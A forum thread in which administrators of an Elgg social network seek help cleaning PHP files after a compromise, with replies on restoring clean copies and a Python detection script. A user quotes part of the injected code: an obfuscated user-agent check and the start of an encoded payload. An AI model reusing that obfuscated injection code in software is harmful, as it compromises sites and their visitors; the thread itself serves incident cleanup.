PHP Injection after hacker attack

We are huge fans of Elgg, and we used to use it with our Cooperative Social Network called Coolmeia.

We suffered a hacker attack and now several (most of) the .php files have some sort of code injected:

http://net.coolmeia.org/groups/profile/805/horta-coletiva/

Is there a fast or efficient way to get rid of it to put the website online again (after changing ftp/cpanel/etc passwords)?

  • What makes you think an attacker has injected code? That is Elgg's own source code. It seems like for some reason your web server is printing the code instead of executing it.

  • Which Elgg version are you using? Do you have access to the server command line?

  • Hi Juno, thanks for your prompt answer. Because we had a strange behaviour in most of our php files:

    <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) && (! strstr($ua,"\x72\166\x3a\61\x31")) && (! strstr($ua,"\x61\156\x64\162\x6f\151\x64")) && (! strstr($ua,"\x6d\157\x62\151\x6c\145")) && (! strstr($ua,"\x69\160\x68\157\x6e\145")) && (! strstr($ua,"\x69\160\x61\144")) && (! strstr($ua,"\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $buwuuprfta = 'y76#<%x5c%x7825tmw!>!#]y84]275]y83]273x7825tzw>!#]y76]277]y72]265]y39]27**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7d]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825gj}Z;h!opjudovg}{;#)x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c5]241]334]368]322]3]364]6]283]427]36]373P6]36825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825tww**WYsboepn)%x5c%7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x78#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}c%x7824-%x5c%x7824<%x5c%x7825j,,*!|x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x563]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7%x5c%x782f20QUUI7jsv%x5c%x78257UFH]y39]252]y83]273]y72]282#<!%x5c

    ...continues...

    And, at the end of the file, it repeats "X" lines of code, differently on every php post...

    I'll check the Elgg version and return. We have access to the server command line, but I'm not the one that has experience with it; I can for sure find someone to deal with it.

  • You should be able to replace all core files with fresh copies of the same Elgg version, same for any community plugins assuming you haven't hacked at them. Then you only need to be concerned with any custom plugins for your project.

    This is where version control comes in handy, if you had it set up in git you could simply do:

    git reset --hard

    and be fixed.
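Where no git history exists, the same idea can be applied by hand: diff the live tree against a pristine copy of the same Elgg release and, separately, flag files that carry the hex/octal-escaped string literals visible in the prologue quoted above. The script below is an added example, not code from this thread or from Elgg; it builds a constructed sample tree in a temp directory (the file names and bodies are made up) and decodes the two escaped keys quoted earlier so they can be read.

```python
import re
import tempfile
from pathlib import Path

# Four or more consecutive \xHH / \ooo escapes inside one PHP double-quoted
# string, e.g. "\x61\156\x75\156\x61"; Elgg's own source never writes keys this way.
ESCAPED_STRING = re.compile(r'"(?:\\(?:x[0-9a-fA-F]{2}|[0-7]{3})){4,}"')
PHP_ESCAPE = re.compile(r'\\(?:x([0-9a-fA-F]{2})|([0-7]{3}))')

def decode_php_escapes(literal):
    """Render an escaped PHP literal as plain text so the obfuscated code can be read."""
    def one(m):
        return chr(int(m.group(1), 16) if m.group(1) else int(m.group(2), 8))
    return PHP_ESCAPE.sub(one, literal.strip('"'))

def scan_tree(suspect_dir, clean_dir):
    """Classify each .php file under suspect_dir as 'modified' or 'added' relative to
    the pristine tree, and record the decoded literals of files that look injected."""
    report = {'modified': [], 'added': [], 'injected': {}}
    for path in Path(suspect_dir).rglob('*.php'):
        rel = str(path.relative_to(suspect_dir))
        clean_path = Path(clean_dir, rel)
        if not clean_path.exists():
            report['added'].append(rel)
        elif path.read_bytes() != clean_path.read_bytes():
            report['modified'].append(rel)
        text = path.read_text(encoding='utf-8', errors='replace')
        if hits := [decode_php_escapes(m.group(0)) for m in ESCAPED_STRING.finditer(text)]:
            report['injected'][rel] = hits
    return report

# Constructed sample reproducing the two escaped keys of the prologue quoted in the thread.
PROLOGUE = ('<?php if(!isset($GLOBALS["\\x61\\156\\x75\\156\\x61"])) { $ua=strtolower($_SERVER['
            '"\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54"]); } ?>')

def demo():
    """Build a constructed clean tree and a tampered copy under a temp dir, then scan it."""
    base = Path(tempfile.mkdtemp())
    clean, suspect = base / 'clean', base / 'suspect'
    for rel, body in {'engine/start.php': '<?php require_once "lib/elgglib.php";\n',
                      'index.php': '<?php echo elgg_view_page("Home");\n'}.items():
        for tree in (clean, suspect):
            (tree / rel).parent.mkdir(parents=True, exist_ok=True)
            (tree / rel).write_text(body)
    # prepend the prologue to one core file; add a plugin file with no clean counterpart
    core = suspect / 'engine/start.php'
    core.write_text(PROLOGUE + core.read_text())
    (suspect / 'mod/custom').mkdir(parents=True)
    (suspect / 'mod/custom/start.php').write_text('<?php // local plugin, not in the release\n')
    return scan_tree(suspect, clean)
```

Files listed under 'added' are the custom plugins Matt mentions and need a manual review, since there is no release copy to compare them with.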

  • Thanks Matt Beckett, from now on, this is the way we should proceed!

    We used some Lorea plugins; some came with errors and we adjusted them, but with no record of what exactly we changed.

    That is what happens when butchers and bakers try to deal with programming! Sorry for the inconvenience.

    Now we were able to get a little bit further, as you can see: http://net.coolmeia.org/index.php

  • I have three versions here. In version.php, we have 1.8.8, but I already have the elgg_master.zip and the 1.8.19...

    It's insane, but we're recovering manually all files...

    Sometimes we make the same mistakes: http://net.coolmeia.org/activity >> "class, )); } else { echo "$icon"; } ?>"  - etc...


  • Now we have finished manually cleaning the duplicated code.

    Now we have a different kind of error: http://net.coolmeia.org/groups/profile/153

    Fatal error:

    An unrecoverable error has occurred and has been logged. Contact the site administrator with the following information:

    Exception #1453948338.

  • And:

    Fatal error:

    elgg:subgroups is not a registered library

  • Can you share your file "/home/coolmeia/public_html/net/mod/widget_manager/views/default/page/layouts/widgets/add_panel.php"?

    The missing ";" can be due to a missing semicolon in any of the previous lines, or there is an issue with the opening and closing of the brackets...